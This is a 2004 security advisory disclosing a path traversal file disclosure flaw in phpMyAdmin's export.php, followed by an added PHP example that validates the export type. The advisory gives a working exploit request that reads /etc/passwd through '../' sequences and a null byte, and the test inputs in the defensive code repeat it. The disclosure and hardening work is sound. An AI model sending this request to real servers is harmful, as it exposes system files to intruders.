Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

From: Cedric Cochin (cco_at_netvigilance.com)
Date: 02/03/04

    Date: Tue, 3 Feb 2004 11:28:57 +0100
    To: submissions@packetstormsecurity.org, vuln@secunia.com, news@securiteam.com, bugtraq@securityfocus.com, bugs@securitytracker.com
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

       Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

    ################################################################################
    Summary :

    phpMyAdmin is a tool written in PHP intended to handle the administration of
    MySQL over the WWW. There is a vulnerability in the current stable version of
    phpMyAdmin that allows an attacker to retrieve arbitrary files from the
    webserver with privileges of the webserver.

    ################################################################################
    Details :

    The export PHP script can be exploited to disclose arbitrary files using an
    include() PHP call.

    Vulnerable Systems:
    * phpMyAdmin 2.5.5-pl1 and prior

    Release Date :
    February 2, 2004

    Severity :
    HIGH

    ################################################################################
    Examples :

                      -------------------------------------------

    I - Arbitrary File Disclosure
    (HIGH Risk)

    File impacted : export.php

    // What type of export are we doing?
    if ($what == 'excel') {
        $type = 'csv';
    } else {
        $type = $what;
    }

    /**
     * Defines the url to return to in case of error in a sql statement
     */
    require('./libraries/export/' . $type . '.php');

    Exploit example:

    - -- HTTP Request --

    http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00

    - -- HTTP Request --

    The vulnerability is available even if PHP register_globals is set to off.

    ################################################################################
    Vendor Status :

    The information has been provided to the phpMyAdmin Project Managers.
    A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.
    - --> http://www.phpmyadmin.net/home_page/
    - --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0

    ################################################################################
    Credit :

    Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
    < cco@netvigilance.com >

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org

    iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2
    ekO25itz2ssIvwgf2WRb/4k=
    =Yuh1
    -----END PGP SIGNATURE-----
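
A hardened form of the `require()` call quoted in the advisory, as an added example that is not part of the original message and is not the fix shipped in 2.5.6-rc1. The function name `resolve_export_plugin()` and the throwaway plugin directory are hypothetical; the idea is to accept `what` only when it is a plain identifier that resolves to a file sitting directly inside the export plugin directory.

```php
<?php
// Added example, not phpMyAdmin code. resolve_export_plugin() and the
// temporary plugin directory below are hypothetical names for illustration.

/**
 * Map the request parameter to an export plugin file, or return null.
 * Only names that resolve to a file directly inside $pluginDir are accepted.
 */
function resolve_export_plugin($what, $pluginDir)
{
    if (!is_string($what)) {
        return null;                    // e.g. what[]=x arrives as an array
    }
    $type = ($what === 'excel') ? 'csv' : $what;   // same mapping as export.php

    // Strict character allowlist: '/', '\', '.' and NUL can never pass.
    // \A and \z anchor the whole string ('$' would tolerate a trailing newline).
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $type)) {
        return null;
    }

    // Defence in depth: the canonical path must sit directly in the plugin dir,
    // which also rejects unknown types and symlinks that point elsewhere.
    $base = realpath($pluginDir);
    $path = realpath($pluginDir . '/' . $type . '.php');
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway plugin directory holding one plugin file.
$dir = sys_get_temp_dir() . '/export_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . '/csv.php', "<?php // constructed sample plugin\n");

// Constructed inputs, including the value from the advisory's request.
$inputs = ['csv', 'excel', "../../../../../../etc/passwd\0", '../csv', 'nosuchtype', ['x']];
foreach ($inputs as $in) {
    $res = resolve_export_plugin($in, $dir);
    printf("%-45s => %s\n", json_encode($in), $res === null ? 'rejected' : basename($res));
}

unlink($dir . '/csv.php');
rmdir($dir);
```

A caller would `require` the returned path only when it is non-null and abort the request otherwise, so the request parameter never reaches the filesystem call unvalidated.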

